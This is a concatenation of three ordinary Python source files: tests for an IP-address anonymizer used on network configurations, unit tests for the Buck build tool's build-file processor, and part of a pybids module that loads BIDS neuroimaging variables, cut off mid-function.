line_w_ip = line.format(*ip_addrs)
anon_line = anonymize_ip_addr(anonymizer, line_w_ip)
# Now anonymize each IP address individually & build another anonymized line
anon_ip_addrs = [anonymize_ip_addr(anonymizer, ip_addr) for ip_addr in ip_addrs]
individually_anon_line = line.format(*anon_ip_addrs)
# Make sure anonymizing each address individually is the same as
# anonymizing all at once
assert anon_line == individually_anon_line
for ip_addr in ip_addrs:
# Make sure the original ip address(es) are removed from the anonymized line
assert ip_addr not in anon_line
@pytest.mark.parametrize(
"line, ip_addrs",
[
("ip address {} 255.255.255.254", ["123.45.67.89"]),
("ip address {} 255.0.0.0", ["10.0.0.0"]),
("ip address {}/16", ["10.0.0.0"]),
("tacacs-server host {}", ["10.1.1.17"]),
("tacacs-server host {}", ["001.021.201.012"]),
("syscon address {} Password", ["10.73.212.5"]),
("1 permit tcp host {} host {} eq 2", ["1.2.3.4", "1.2.3.45"]),
("1 permit tcp host {} host {} eq 2", ["1.2.123.4", "11.2.123.4"]),
("1 permit tcp host {} host {} eq 2", ["1.2.30.45", "1.2.30.4"]),
("1 permit tcp host {} host {} eq 2", ["11.20.3.4", "1.20.3.4"]),
("something host {} host {} host {}", ["1.2.3.4", "1.2.3.5", "1.2.3.45"]),
# These formats may occur in Batfish output
('"{}"', ["1.2.3.45"]),
("({})", ["1.2.3.45"]),
("[IP addresses:{},{}]", ["1.2.3.45", "1.2.3.5"]),
("flow:{}->{}", ["1.2.3.45", "1.2.3.5"]),
("something={}", ["1.2.3.45"]),
("something <{}>", ["1.2.3.45"]),
("something '{}'", ["1.2.3.45"]),
],
)
def test_v4_anonymize_line(anonymizer_v4, line, ip_addrs):
"""Test IPv4 address removal from config lines."""
anonymize_line_general(anonymizer_v4, line, ip_addrs)
@pytest.mark.parametrize("enclosing", "_:;[]$~!@#$%^&*()-+=[]|<>?")
def test_v4_anonymize_enclosed_addr(anonymizer_v4, enclosing):
"""Test IPv4 address removal from config lines with different enclosing characters."""
ip_addr = "1.2.3.4"
line = enclosing + "{}" + enclosing
anonymize_line_general(anonymizer_v4, line, [ip_addr])
@pytest.mark.parametrize(
"line, ip_addrs",
[
("ip address {} something::something", ["1234::5678"]),
("ip address {} blah {}", ["1234::", "1234:5678::9abc:def0"]),
("ip address {} blah {} blah", ["::1", "1234:5678:abcd:dcba::9abc:def0"]),
("ip address {}/16 blah", ["::1"]),
("ip address {}/16 blah", ["1::"]),
("ip address {}/16 blah", ["1::1"]),
("ip address {}/16 blah", ["ffff:ffff::ffff:ffff"]),
],
)
def test_v6_anonymize_line(anonymizer_v6, line, ip_addrs):
"""Test IPv6 address removal from config lines."""
anonymize_line_general(anonymizer_v6, line, ip_addrs)
@pytest.mark.parametrize("enclosing", ".;[]$~!@#$%^&*()-+=[]|<>?")
def test_v6_anonymize_enclosed_addr(anonymizer_v6, enclosing):
"""Test IPv6 address removal from config lines with different enclosing characters."""
ip_addr = "1::1"
line = enclosing + "{}" + enclosing
anonymize_line_general(anonymizer_v6, line, [ip_addr])
def get_ip_v4_class(ip_int):
"""Return the letter corresponding to the IP class the ip_int is in."""
if (ip_int & 0x80000000) == 0x00000000:
return "A"
elif (ip_int & 0xC0000000) == 0x80000000:
return "B"
elif (ip_int & 0xE0000000) == 0xC0000000:
return "C"
elif (ip_int & 0xF0000000) == 0xE0000000:
return "D"
else:
return "E"
def get_ip_v4_class_mask(ip_int):
"""Return a mask indicating bits preserved when preserving class."""
if (ip_int & 0xE0000000) == 0xE0000000:
return 0xF0000000
elif (ip_int & 0xC0000000) == 0xC0000000:
return 0xE0000000
elif (ip_int & 0x80000000) == 0x80000000:
return 0xC0000000
else:
return 0x80000000
@pytest.mark.parametrize(
"ip_addr",
[
"0.0.0.0",
"127.255.255.255", # Class A
"128.0.0.0",
"191.255.255.255", # Class B
"192.0.0.0",
"223.255.255.255", # Class C
"224.0.0.0",
"239.255.255.255", # Class D
"240.0.0.0",
"247.255.255.255", # Class E
],
)
def test_v4_class_preserved(flip_anonymizer_v4, ip_addr):
"""Test that IPv4 classes are preserved."""
ip_int = int(flip_anonymizer_v4.make_addr(ip_addr))
ip_int_anon = flip_anonymizer_v4.anonymize(ip_int)
# IP v4 class should match after anonymization
assert get_ip_v4_class(ip_int) == get_ip_v4_class(ip_int_anon)
# Anonymized ip address should not match the original ip address
assert ip_int != ip_int_anon
# All bits that are not forced to be preserved are flipped
class_mask = get_ip_v4_class_mask(ip_int)
assert 0xFFFFFFFF ^ class_mask == ip_int ^ ip_int_anon
def test_preserve_custom_prefixes():
"""Test that a custom prefix is preserved correctly."""
subnet = "170.0.0.0/8"
anonymizer = IpAnonymizer(SALT, [subnet])
ip_start = int(anonymizer.make_addr("170.0.0.0"))
ip_start_anon = anonymizer.anonymize(ip_start)
ip_end = int(anonymizer.make_addr("170.255.255.255"))
ip_end_anon = anonymizer.anonymize(ip_end)
network = ipaddress.ip_network(subnet)
# Make sure the anonymized addresses are different from the originals
assert ip_start_anon != ip_start
assert ip_end_anon != ip_end
# Make sure the anonymized addresses have the same prefix as the originals
assert ipaddress.ip_address(ip_start_anon) in network
assert ipaddress.ip_address(ip_end_anon) in network
def test_preserve_custom_addresses():
"""Test that addresses within a preserved block are flagged correctly as NOT needing anonymization."""
addresses = [
"170.0.0.0/8",
"11.11.11.11",
]
anonymizer = IpAnonymizer(SALT, preserve_addresses=addresses)
ip_start = int(anonymizer.make_addr("170.0.0.0"))
ip_end = int(anonymizer.make_addr("170.255.255.255"))
ip_other = int(anonymizer.make_addr("11.11.11.11"))
ip_outside = int(anonymizer.make_addr("10.11.12.13"))
# Make sure anonymizer indicates addresses within preserved network blocks should not be anonymized
assert not anonymizer.should_anonymize(ip_start)
assert not anonymizer.should_anonymize(ip_end)
assert not anonymizer.should_anonymize(ip_other)
# Make sure the address outside the preserved block should be anonymized
assert anonymizer.should_anonymize(ip_outside)
def test_preserve_address_preserves_prefix():
"""Test that common prefixes are still preserved when addresses are preserved."""
addr_str = "11.11.11.11"
addr = ipaddress.ip_address(addr_str)
addr_int = int(addr)
anonymizer = IpAnonymizer(SALT, preserve_addresses=[addr_str])
addr_len = addr.max_prefixlen
for i in range(addr_len):
# Anonymize an address similar to the original, with 1 bit flipped
similar_addr = ipaddress.ip_address(addr_int ^ (1 << i))
similar_anon = ipaddress.ip_address(anonymizer.anonymize(int(similar_addr)))
# Confirm cpl before anonymization matches cpl after anonymization
assert _cpl_v4(similar_anon, addr) == _cpl_v4(similar_addr, addr)
def _cpl_v4(left, right):
"""
Return the common prefix length for two IPv4 addresses.
e.g.
_cpl_v4(1.0.0.1, 1.0.0.1) == 32
_cpl_v4(1.0.0.1, 1.0.128.1) == 16
_cpl_v4(1.0.0.1, 128.0.0.1) == 0
"""
xor = int(left) ^ int(right)
max_shift = 32
for i in reversed(range(max_shift)):
if xor & (0x1 << i):
return max_shift - 1 - i
return max_shift
@pytest.mark.parametrize("start, end, subnet", private_blocks)
def test_preserve_private_prefixes(anonymizer_v4, start, end, subnet):
"""Test that private-use prefixes are preserved by default."""
ip_int_start = int(anonymizer_v4.make_addr(start))
ip_int_start_anon = anonymizer_v4.anonymize(ip_int_start)
ip_int_end = int(anonymizer_v4.make_addr(end))
ip_int_end_anon = anonymizer_v4.anonymize(ip_int_end)
network = ipaddress.ip_network(subnet)
# Make sure addresses in the block stay in the block
assert ipaddress.ip_address(ip_int_start_anon) in network
assert ipaddress.ip_address(ip_int_end_anon) in network
@pytest.mark.parametrize("length", range(0, 33))
def test_preserve_host_bits(length):
"""Test that host bits are preserved, for every length."""
anonymizer = IpAnonymizer(
salt=SALT, salter=lambda a, b: 1, preserve_suffix=length, preserve_prefixes=[]
)
anonymized = anonymizer.anonymize(0)
# The first <32-length> bits are 1, the last <length> bits are all 0
expected = "1" * (32 - length) + "0" * length
assert "{:032b}".format(anonymized) == expected
# Deanonymization flips the bits back
deanonymized = anonymizer.deanonymize(anonymized)
assert deanonymized == 0
@pytest.mark.parametrize(
"anonymizer,ip_addr",
[("v4", s) for s in ip_v4_list] + [("v6", s) for s in ip_v6_list],
indirect=["anonymizer"],
)
def test_anonymize_addr(anonymizer, ip_addr):
"""Test conversion from original to anonymized IP address."""
ip_int = int(anonymizer.make_addr(ip_addr))
ip_int_anon = anonymizer.anonymize(ip_int)
# Anonymized ip address should not match the original address
assert ip_int != ip_int_anon
full_bit_mask = (1 << anonymizer.length) - 1
# Confirm prefixes for similar addresses are preserved after anonymization
for i in range(0, anonymizer.length):
# Flip the ith bit of the org address and use that as the similar address
diff_mask = 1 << i
ip_int_similar = ip_int ^ diff_mask
ip_int_similar_anon = anonymizer.anonymize(ip_int_similar)
# Using i + 1 since same_mask should mask off ith bit, not preserve it
same_mask = full_bit_mask & (full_bit_mask << (i + 1))
# Common prefix for addresses should match after anonymization
assert ip_int_similar_anon & same_mask == ip_int_anon & same_mask
# Confirm the bit that is different in the original addresses is different in the anonymized addresses
assert ip_int_similar_anon & diff_mask != ip_int_anon & diff_mask
def test_anonymize_ip_order_independent():
"""Test to make sure order does not affect anonymization of addresses."""
anonymizer_v4_forward = IpAnonymizer(SALT)
ip_lookup_forward = {}
for ip_addr in ip_v4_list:
ip_int = int(anonymizer_v4_forward.make_addr(ip_addr))
ip_int_anon = anonymizer_v4_forward.anonymize(ip_int)
ip_lookup_forward[ip_int] = ip_int_anon
anonymizer_v4_reverse = IpAnonymizer(SALT)
for ip_addr in reversed(ip_v4_list):
ip_int_reverse = int(anonymizer_v4_reverse.make_addr(ip_addr))
ip_int_anon_reverse = anonymizer_v4_reverse.anonymize(ip_int_reverse)
# Confirm anonymizing in reverse order does not affect
# anonymization results
assert ip_int_anon_reverse == ip_lookup_forward[ip_int_reverse]
anonymizer_v4_extras = IpAnonymizer(SALT)
for ip_addr in ip_v4_list:
ip_int_extras = int(anonymizer_v4_extras.make_addr(ip_addr))
ip_int_anon_extras = anonymizer_v4_extras.anonymize(ip_int_extras)
ip_int_inverted = ip_int_extras ^ 0xFFFFFFFF
anonymizer_v4_extras.anonymize(ip_int_inverted)
# Confirm anonymizing with extra addresses in-between does not
# affect anonymization results
assert ip_int_anon_extras == ip_lookup_forward[ip_int_extras]
@pytest.mark.parametrize("ip_addr", ip_v4_list)
def test_deanonymize_ip(anonymizer_v4, ip_addr):
"""Test reversing IP anonymization."""
ip_int = int(anonymizer_v4.make_addr(ip_addr))
ip_int_anon = anonymizer_v4.anonymize(ip_int)
ip_int_unanon = anonymizer_v4.deanonymize(ip_int_anon)
# Make sure unanonymizing an anonymized address produces the original address
assert ip_int == ip_int_unanon
def test_dump_iptree(tmpdir, anonymizer_v4):
"""Test ability to accurately dump IP address anonymization mapping."""
ip_mapping = {}
ip_mapping_from_dump = {}
# Make sure all addresses to be checked are in ip_tree and generate reference mapping
for ip_addr_raw in ip_v4_list:
ip_addr = anonymizer_v4.make_addr(ip_addr_raw)
ip_int = int(ip_addr)
ip_int_anon = anonymizer_v4.anonymize(ip_int)
ip_addr_anon = str(ipaddress.IPv4Address(ip_int_anon))
ip_mapping[str(ip_addr)] = ip_addr_anon
filename = str(tmpdir.mkdir("test").join("test_dump_iptree.txt"))
with open(filename, "w") as f_tmp:
anonymizer_v4.dump_to_file(f_tmp)
with open(filename, "r") as f_tmp:
# Build mapping dict from the output of the ip_tree dump
for line in f_tmp.readlines():
m = re.match(r"\s*(\d+\.\d+.\d+.\d+)\s+(\d+\.\d+.\d+.\d+)\s*", line)
ip_addr = m.group(1)
ip_addr_anon = m.group(2)
ip_mapping_from_dump[ip_addr] = ip_addr_anon
for ip_addr in ip_mapping:
# Confirm anon addresses from ip_tree dump match anon addresses from _convert_to_anon_ip
assert ip_mapping[ip_addr] == ip_mapping_from_dump[ip_addr]
def test_dump_iptree_preserving_host_bits(tmpdir, anonymizer_v4_preserving_host_bits):
"""Test IP address anonymization map-dump, when preserving host bits."""
ip_map_ref = {}
ip_map_from_dump = {}
# Build reference map
for ip_addr_raw in ip_v4_list:
ip_addr = anonymizer_v4_preserving_host_bits.make_addr(ip_addr_raw)
ip_int_anon = anonymizer_v4_preserving_host_bits.anonymize(int(ip_addr))
ip_addr_anon = str(ipaddress.IPv4Address(ip_int_anon))
ip_map_ref[str(ip_addr)] = ip_addr_anon
# Build mapping dict from the output of the ip_tree dump text file
filename = str(tmpdir.mkdir("test").join("test_dump_iptree.txt"))
with open(filename, "w") as f_tmp:
anonymizer_v4_preserving_host_bits.dump_to_file(f_tmp)
with open(filename, "r") as f_tmp:
for line in f_tmp.readlines():
m = re.match(r"\s*(\d+\.\d+.\d+.\d+)\s+(\d+\.\d+.\d+.\d+)\s*", line)
ip_addr = m.group(1)
ip_addr_anon = m.group(2)
ip_map_from_dump[ip_addr] = ip_addr_anon
# Confirm dumped text map lines up with expected/reference map
for ip_addr in ip_map_ref:
assert ip_map_ref[ip_addr] == ip_map_from_dump[ip_addr]
@pytest.mark.parametrize(
"line",
[
"01:23:45:67:89:ab",
"01:02:03:04:05:06:07:08:09",
"01:02:03:04::05:06:07:08",
"1.2.3.4.example.net",
"1.2.3.4something.example.net",
"a.1.2.3.4",
"1.2.3",
"1.2.3.4.5",
"something1::abc",
"123::ABsomething",
"1.2.333.4",
"1.2.0333.4",
"1.256.3.4",
],
)
def test_false_positives(anonymizer_v4, anonymizer_v6, line):
"""Test that text without a valid address is not anonymized."""
anon_line = anonymize_ip_addr(anonymizer_v4, line)
anon_line = anonymize_ip_addr(anonymizer_v6, anon_line)
# Confirm the anonymized line is unchanged
assert line == anon_line
@pytest.mark.parametrize(
"zeros, no_zeros",
[
("0.0.0.0", "0.0.0.0"),
("0.0.0.3", "0.0.0.3"),
("128.0.0.0", "128.0.0.0"),
("0.127.0.0", "0.127.0.0"),
("10.73.212.5", "10.73.212.5"),
("010.73.212.05", "10.73.212.5"),
("255.255.255.255", "255.255.255.255"),
("170.255.85.1", "170.255.85.1"),
("10.11.12.13", "10.11.12.13"),
("010.11.12.13", "10.11.12.13"),
("10.011.12.13", "10.11.12.13"),
("10.11.012.13", "10.11.12.13"),
("10.11.12.013", "10.11.12.13"),
("010.0011.00000012.000", "10.11.12.0"),
],
)
def test_v4_anonymizer_ignores_leading_zeros(anonymizer_v4, zeros, no_zeros):
"""Test that v4 IP address ignore leading zeros & don't interpret octal."""
assert ipaddress.IPv4Address(no_zeros) == anonymizer_v4.make_addr(zeros)
@pytest.mark.parametrize(
"ip_int, expected",
[
(0b00000000000000000000000000000000, False),
(0b00000000000000000000000000000001, False),
(0b00000000000000000000000000001111, False),
(0b11110000000000000000000000000000, False),
(0b10000000000000000000000000000000, False),
(0b01111111111000000000000000000000, True),
(0b00000011111000000000000000000000, True),
(0b00000000000100000000000000000000, True),
(0b00010101001001000000000000000000, True),
(0b00000000000000000010000000000000, True),
(0b00000000000000000011111111111110, True),
(0b00000000010000000100000000000000, True),
],
)
def test_v4_should_anonymize(anonymizer_v4, ip_int, expected):
"""Test that the IpV4 anonymizer does not anonymize masks."""
assert expected == anonymizer_v4.should_anonymize(ip_int)
|
|
import __builtin__
import os
import unittest
import shutil
import tempfile
from .buck import BuildFileProcessor, DiagnosticMessageAndLevel, add_rule
def foo_rule(name, srcs=[], visibility=[], build_env=None):
add_rule({
'buck.type': 'foo',
'name': name,
'srcs': srcs,
'visibility': visibility,
}, build_env)
def get_config_from_results(results):
for result in results:
if result.keys() == ['__configs']:
return result['__configs']
raise ValueError(str(results))
class ProjectFile(object):
def __init__(self, path, contents):
self.path = path
self.name = '//{0}'.format(path)
if isinstance(contents, (tuple, list)):
contents = os.linesep.join(contents) + os.linesep
self.contents = contents
class BuckTest(unittest.TestCase):
def setUp(self):
self.project_root = tempfile.mkdtemp()
self.allow_empty_globs = False
self.build_file_name = 'BUCK'
self.watchman_client = None
self.watchman_error = None
def tearDown(self):
shutil.rmtree(self.project_root, True)
def write_file(self, pfile):
with open(os.path.join(self.project_root, pfile.path), 'w') as f:
f.write(pfile.contents)
def write_files(self, *pfiles):
for pfile in pfiles:
self.write_file(pfile)
def create_build_file_processor(self, *includes, **kwargs):
return BuildFileProcessor(
self.project_root,
self.project_root, # watchman_watch_root
None, # watchman_project_prefix
self.build_file_name,
self.allow_empty_globs,
False, # ignore_buck_autodeps_files
self.watchman_client,
self.watchman_error,
includes,
**kwargs)
def test_sibling_includes_use_separate_globals(self):
"""
Test that consecutive includes can't see each others globals.
If a build file includes two include defs, one after another, verify
that the first's globals don't pollute the second's (e.g. the second
cannot implicitly reference globals from the first without including
it itself).
"""
# Setup the includes defs. The first one defines a variable that the
# second one (incorrectly) implicitly references.
include_def1 = ProjectFile(path='inc_def1', contents=('FOO = 1',))
include_def2 = ProjectFile(path='inc_def2', contents=('BAR = FOO',))
self.write_files(include_def1, include_def2)
# Construct a processor using the above as default includes, and verify
# that the second one can't use the first's globals.
build_file = ProjectFile(path='BUCK', contents='')
self.write_file(build_file)
build_file_processor = self.create_build_file_processor(
include_def1.name,
include_def2.name)
self.assertRaises(
NameError,
build_file_processor.process,
build_file.path, set())
# Construct a processor with no default includes, have a generated
# build file include the include defs one after another, and verify
# that the second one can't use the first's globals.
build_file = ProjectFile(
path='BUCK',
contents=(
'include_defs({0!r})'.format(include_def1.name),
'include_defs({0!r})'.format(include_def2.name),
))
self.write_file(build_file)
build_file_processor = self.create_build_file_processor()
self.assertRaises(
NameError,
build_file_processor.process,
build_file.path, set())
def test_lazy_include_defs(self):
"""
Tests bug reported in https://github.com/facebook/buck/issues/182.
If a include def references another include def via a lazy include_defs
call is some defined function, verify that it can correctly access the
latter's globals after the import.
"""
# Setup the includes defs. The first one defines a variable that the
# second one references after a local 'include_defs' call.
include_def1 = ProjectFile(path='inc_def1', contents=('FOO = 1',))
include_def2 = ProjectFile(
path='inc_def2',
contents=(
'def test():',
' include_defs({0!r})'.format(include_def1.name),
' FOO',
))
self.write_files(include_def1, include_def2)
# Construct a processor using the above as default includes, and verify
# that the function 'test' can use 'FOO' after including the first
# include def.
build_file = ProjectFile(path='BUCK', contents=('test()',))
self.write_file(build_file)
build_file_processor = self.create_build_file_processor(
include_def1.name,
include_def2.name)
build_file_processor.process(build_file.path, set())
# Construct a processor with no default includes, have a generated
# build file include the include defs one after another, and verify
# that the function 'test' can use 'FOO' after including the first
# include def.
build_file = ProjectFile(
path='BUCK',
contents=(
'include_defs({0!r})'.format(include_def1.name),
'include_defs({0!r})'.format(include_def2.name),
'test()',
))
self.write_file(build_file)
build_file_processor = self.create_build_file_processor()
build_file_processor.process(build_file.path, set())
def test_private_globals_are_ignored(self):
"""
Verify globals prefixed with '_' don't get imported via 'include_defs'.
"""
include_def = ProjectFile(path='inc_def1', contents=('_FOO = 1',))
self.write_file(include_def)
# Test we don't get private module attributes from default includes.
build_file = ProjectFile(path='BUCK', contents=('_FOO',))
self.write_file(build_file)
build_file_processor = self.create_build_file_processor(
include_def.name)
self.assertRaises(
NameError,
build_file_processor.process,
build_file.path, set())
# Test we don't get private module attributes from explicit includes.
build_file = ProjectFile(
path='BUCK',
contents=(
'include_defs({0!r})'.format(include_def.name),
'_FOO',
))
self.write_file(build_file)
build_file_processor = self.create_build_file_processor()
self.assertRaises(
NameError,
build_file_processor.process,
build_file.path, set())
def test_implicit_includes_apply_to_explicit_includes(self):
"""
Verify that implict includes are applied to explicit includes.
"""
# Setup an implicit include that defines a variable, another include
# that uses it, and a build file that uses the explicit include.
implicit_inc = ProjectFile(path='implicit', contents=('FOO = 1',))
explicit_inc = ProjectFile(path='explicit', contents=('FOO',))
build_file = ProjectFile(
path='BUCK',
contents=(
'include_defs({0!r})'.format(explicit_inc.name),
))
self.write_files(implicit_inc, explicit_inc, build_file)
# Run the processor to verify that the explicit include can use the
# variable in the implicit include.
build_file_processor = self.create_build_file_processor(
implicit_inc.name)
build_file_processor.process(build_file.path, set())
def test_all_list_is_respected(self):
"""
Verify that the `__all__` list in included files can be used to narrow
what gets pulled in.
"""
include_def = ProjectFile(
path='inc_def1',
contents=('__all__ = []', 'FOO = 1'))
self.write_file(include_def)
# Test we don't get non-whitelisted attributes from default includes.
build_file = ProjectFile(path='BUCK', contents=('FOO',))
self.write_file(build_file)
build_file_processor = self.create_build_file_processor(
include_def.name)
self.assertRaises(
NameError,
build_file_processor.process,
build_file.path, set())
# Test we don't get non-whitelisted attributes from explicit includes.
build_file = ProjectFile(
path='BUCK',
contents=(
'include_defs({0!r})'.format(include_def.name),
'FOO',
))
self.write_file(build_file)
build_file_processor = self.create_build_file_processor()
self.assertRaises(
NameError,
build_file_processor.process,
build_file.path, set())
def test_do_not_override_overridden_builtins(self):
"""
We want to ensure that if you override something like java_binary, and then use
include_defs to get another file, you don't end up clobbering your override.
"""
# Override java_library and have it automatically add a dep
build_defs = ProjectFile(
path='BUILD_DEFS',
contents=(
# While not strictly needed for this test, we want to make sure we are overriding
# a provided method and not just defining it ourselves.
'old_get_base_path = get_base_path',
'def get_base_path(*args, **kwargs):',
' raise ValueError()',
'include_defs("//OTHER_DEFS")',
))
other_defs = ProjectFile(path='OTHER_DEFS', contents=())
build_file = ProjectFile(
path='BUCK',
contents=(
'get_base_path()',
))
self.write_files(build_defs, other_defs, build_file)
build_file_processor = self.create_build_file_processor(build_defs.name)
build_file_processor.install_builtins(__builtin__.__dict__)
self.assertRaises(
ValueError,
build_file_processor.process,
build_file.path, set())
def test_watchman_glob_failure_falls_back_to_regular_glob_and_adds_diagnostic(self):
class FakeWatchmanError(Exception):
pass
class FakeWatchmanClient:
def FakeWatchmanClient(self):
self.query_invoked = False
def query(self, *args):
self.query_invoked = True
raise FakeWatchmanError("whoops")
def close(self):
pass
self.watchman_client = FakeWatchmanClient()
self.watchman_error = FakeWatchmanError
build_file = ProjectFile(
path='BUCK',
contents=(
'foo_rule(',
' name="foo",'
' srcs=glob(["*.java"]),',
')'
))
java_file = ProjectFile(path='Foo.java', contents=())
self.write_files(build_file, java_file)
build_file_processor = self.create_build_file_processor(extra_funcs=[foo_rule])
build_file_processor.install_builtins(__builtin__.__dict__)
diagnostics = set()
rules = build_file_processor.process(build_file.path, diagnostics)
self.assertTrue(self.watchman_client.query_invoked)
self.assertEqual(['Foo.java'], rules[0]['srcs'])
self.assertEqual(
set([DiagnosticMessageAndLevel(
'Watchman error, falling back to slow glob: whoops',
'error')]),
diagnostics)
def test_watchman_glob_warning_adds_diagnostic(self):
class FakeWatchmanClient:
def query(self, *args):
return {'warning': 'This is a warning', 'files': ['Foo.java']}
def close(self):
pass
self.watchman_client = FakeWatchmanClient()
build_file = ProjectFile(
path='BUCK',
contents=(
'foo_rule(',
' name="foo",'
' srcs=glob(["*.java"]),',
')'
))
java_file = ProjectFile(path='Foo.java', contents=())
self.write_files(build_file, java_file)
build_file_processor = self.create_build_file_processor(extra_funcs=[foo_rule])
build_file_processor.install_builtins(__builtin__.__dict__)
diagnostics = set()
rules = build_file_processor.process(build_file.path, diagnostics)
self.assertEqual(['Foo.java'], rules[0]['srcs'])
self.assertEqual(
set([DiagnosticMessageAndLevel('Watchman warning: This is a warning', 'warning')]),
diagnostics)
def test_read_config(self):
"""
Verify that the builtin `read_config()` function works.
"""
build_file = ProjectFile(
path='BUCK',
contents=(
'assert read_config("hello", "world") == "foo"',
'assert read_config("hello", "bar") is None',
'assert read_config("hello", "goo", "default") == "default"',
))
self.write_file(build_file)
build_file_processor = self.create_build_file_processor(
configs={('hello', 'world'): 'foo'})
result = build_file_processor.process(build_file.path, set())
self.assertEquals(
get_config_from_results(result),
{'hello': {'world': 'foo', 'bar': None, 'goo': None}})
|
|
""" Tools for reading/writing BIDS data files. """
from os.path import join
import warnings
import json
import numpy as np
import pandas as pd
from bids.utils import listify
from .entities import NodeIndex
from .variables import SparseRunVariable, DenseRunVariable, SimpleVariable
BASE_ENTITIES = ['subject', 'session', 'task', 'run']
ALL_ENTITIES = BASE_ENTITIES + ['datatype', 'suffix', 'acquisition']
def load_variables(layout, types=None, levels=None, skip_empty=True,
dataset=None, scope='all', **kwargs):
"""A convenience wrapper for one or more load_*_variables() calls.
Parameters
----------
layout : :obj:`bids.layout.BIDSLayout`
BIDSLayout containing variable files.
types : str or list
Types of variables to retrieve. All valid values
reflect the filename stipulated in the BIDS spec for each kind of
variable. Valid values include: 'events', 'physio', 'stim',
'scans', 'participants', 'sessions', and 'regressors'.
levels : str or list
Optional level(s) of variables to load. Valid
values are 'run', 'session', 'subject', or 'dataset'. This is
simply a shorthand way to specify types--e.g., 'run' will be
converted to types=['events', 'physio', 'stim', 'regressors'].
skip_empty : bool
Whether or not to skip empty Variables (i.e.,
where there are no rows/records in a file after applying any
filtering operations like dropping NaNs).
dataset : NodeIndex
An existing NodeIndex container to store the
loaded data in. Can be used to iteratively construct a dataset
that contains otherwise heterogeneous sets of variables. If None,
a new NodeIndex is used.
scope : str or list
The scope of the space to search for variables. See
docstring for BIDSLayout for details and valid predefined values.
kwargs : dict
Optional keyword arguments to pass onto the individual
load_*_variables() calls.
Returns
-------
A NodeIndex instance.
Examples
--------
>>> load_variables(layout, ['events', 'physio'], subject='01') # doctest: +SKIP
# returns all variables stored in _events.tsv and _physio.tsv.gz files
# for runs that belong to subject with id '01'.
"""
TYPES = ['events', 'physio', 'stim', 'scans', 'participants', 'sessions',
'regressors']
types = listify(types)
if types is None:
if levels is not None:
types = []
lev_map = {
'run': ['events', 'physio', 'stim', 'regressors'],
'session': ['scans'],
'subject': ['sessions'],
'dataset': ['participants']
}
[types.extend(lev_map[l.lower()]) for l in listify(levels)]
else:
types = TYPES
bad_types = set(types) - set(TYPES)
if bad_types:
raise ValueError("Invalid variable types: %s" % bad_types)
dataset = dataset or NodeIndex()
run_types = list({'events', 'physio', 'stim', 'regressors'} - set(types))
type_flags = {t: False for t in run_types}
if len(type_flags) < 4:
_kwargs = kwargs.copy()
_kwargs.update(type_flags)
dataset = _load_time_variables(layout, dataset, scope=scope, **_kwargs)
for t in ({'scans', 'sessions', 'participants'} & set(types)):
kwargs.pop('suffix', None) # suffix is always one of values aboves
dataset = _load_tsv_variables(layout, t, dataset, scope=scope,
**kwargs)
return dataset
def _get_nvols(img_f):
import nibabel as nb
img = nb.load(img_f)
nvols = 0
if isinstance(img, nb.Nifti1Pair):
nvols = img.shape[3]
elif isinstance(img, nb.Cifti2Image):
for ax in map(img.header.get_axis, range(len(img.header.matrix))):
if isinstance(ax, nb.cifti2.SeriesAxis):
nvols = ax.size
break
else:
raise ValueError("No series axis found in %s" % img_f)
elif isinstance(img, nb.GiftiImage):
nvols = len(img.get_arrays_from_intent('time series'))
else:
raise ValueError("Unknown image type %s: %s" % img.__class__, img_f)
return nvols
def _load_time_variables(layout, dataset=None, columns=None, scan_length=None,
drop_na=True, events=True, physio=True, stim=True,
regressors=True, skip_empty=True, scope='all',
**selectors):
"""Loads all variables found in *_events.tsv files and returns them as a
BIDSVariableCollection.
Parameters
----------
layout : :obj:`bids.layout.BIDSLayout`
A BIDSLayout to scan.
dataset : NodeIndex
A BIDS NodeIndex container. If None, a new one is
initialized.
columns : list
Optional list of names specifying which columns in the
event files to read. By default, reads all columns found.
scan_length : float
Optional duration of runs (in seconds). By
default, this will be extracted from the BOLD image. However, in
cases where the user doesn't have access to the images (e.g.,
because only file handles are locally available), a fixed duration
can be manually specified as a fallback.
drop_na : bool
If True, removes all events where amplitude is n/a. If
False, leaves n/a values intact. Note that in the latter case,
transformations that requires numeric values may fail.
events : bool
If True, extracts variables from events.tsv files.
physio : bool
If True, extracts variables from _physio files.
stim : bool
If True, extracts variables from _stim files.
skip_empty : bool
Whether or not to skip empty Variables (i.e.,
where there are no rows/records in a file, or all onsets,
durations, and amplitudes are 0).
scope : str or list
The scope of the space to search for variables. See
docstring for BIDSLayout for details and valid predefined values.
selectors : dict
Optional keyword arguments passed on to the
BIDSLayout instance's get() method; can be used to constrain
which data are loaded.
Returns
-------
A NodeIndex instance.
"""
# Extract any non-keyword arguments
selectors = selectors.copy()
if dataset is None:
dataset = NodeIndex()
selectors['datatype'] = 'func'
selectors['suffix'] = 'bold'
exts = selectors.pop('extension', ['.nii', '.nii.gz', '.func.gii', '.dtseries.nii'])
images = layout.get(return_type='object', scope=scope, extension=exts, **selectors)
if not images:
raise ValueError("No functional images that match criteria found.")
# Main loop over images
for img_obj in images:
entities = img_obj.entities
img_f = img_obj.path
# Run is not mandatory, but we need a default for proper indexing
if 'run' in entities:
entities['run'] = int(entities['run'])
tr = img_obj.get_metadata()["RepetitionTime"]
# Get duration of run: first try to get it directly from the image
# header; if that fails, look for a scan_length argument.
try:
nvols = _get_nvols(img_f)
duration = nvols * tr
except Exception as e:
if scan_length is not None:
duration = scan_length
else:
msg = ("Unable to extract scan duration from one or more "
"BOLD runs, and no scan_length argument was provided "
"as a fallback. Please check that the image files are "
"available, or manually specify the scan duration.")
raise ValueError(msg) from e
# We don't want to pass all the image file's entities onto get_node(),
# as there can be unhashable nested slice timing values, and this also
# slows down querying unnecessarily. Instead, pick out files only based
# on the core BIDS entities and any entities explicitly passed as
# selectors.
# TODO: one downside of this approach is the stripped entities also
# won't be returned in the resulting node due to the way things are
# implemented. Consider adding a flag to control this.
select_on = {k: v for (k, v) in entities.items()
if k in BASE_ENTITIES or k in selectors}
# If a matching node already exists, return it
result = dataset.get_nodes('run', select_on)
if result:
if len(result) > 1:
raise ValueError("More than one existing Node matches the "
"specified entities! You may need to pass "
"additional selectors to narrow the search.")
run_info = result[0].get_info()
else:
# Otherwise create a new node and use that.
# We first convert any entity values that are currently collections to
# JSON strings to prevent nasty hashing problems downstream. Note that
# isinstance() isn't as foolproof as actually trying to hash the
# value, but the latter is likely to be slower, and since values are
# coming from JSON or filenames, there's no real chance of encountering
# anything but a list or dict.
entities = {
k: (json.dumps(v) if isinstance(v, (list, dict)) else v)
for (k, v) in entities.items()
}
